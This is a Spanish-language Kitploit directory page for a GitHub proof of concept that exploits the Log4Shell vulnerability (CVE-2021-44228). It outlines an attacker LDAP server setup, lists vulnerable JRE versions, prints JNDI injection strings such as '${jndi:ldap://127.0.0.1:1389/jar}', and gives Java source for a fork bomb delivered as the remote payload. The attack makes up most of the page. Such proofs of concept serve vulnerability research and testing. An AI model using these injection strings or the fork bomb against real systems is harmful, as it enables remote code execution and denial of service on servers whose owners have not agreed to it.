Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4j-exploit-fork-bomb — 💣💥💀 Prueba de concepto: ejemplo de lanzamiento de un fork-bomb en un servidor remoto gracias a la vulnerabilidad CVE-2021-44228 | Kitploit
Herramientas/GitHubGitHub/funcid/log4j-exploit-fork-bomb
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlDesarrollo de Payloads
GitHubfuncid/log4j-exploit-fork-bomb

log4j-exploit-fork-bomb

💣💥💀 Prueba de concepto: ejemplo de lanzamiento de un fork-bomb en un servidor remoto gracias a la vulnerabilidad CVE-2021-44228

Ver Repositorio
hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

log4j-exploit-with-fork-bomb

💣💥💀 Proof of Concept: ejemplo de ejecución de una fork bomb en un servidor remoto gracias a la vulnerabilidad CVE-2021-44228

  1. Creamos el servidor LDAP del atacante (módulo server), que entregará representaciones de cadenas y código (módulo payload)

  2. Creamos un ejemplo de víctima (módulo victim) y pasamos a Log4j la cadena Versión JRE <= 6u211, 7u201, 8u191 y 11.0.1

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
  1. La aplicación víctima recibe del servidor atacante un array de bytes y lo interpreta como una cadena a sustituir o como código ejecutable (parámetro com.sun.jndi.ldap.object.trustURLCodebase = true)

  2. Como ejemplo, el código ejecutable será una fork bomb (un programa que lanza copias de sí mismo saturando todo el tiempo de CPU)

root@kitploit:~
public class ForkBomb {

  public static void main(String... args) {
  
    Runtime.getRuntime().exec(new String[] {
        "javaw", 
        "-cp", 
        System.getProperty("java.class.path"), 
        "ForkBomb"
    });
  }
}
Descargar herramienta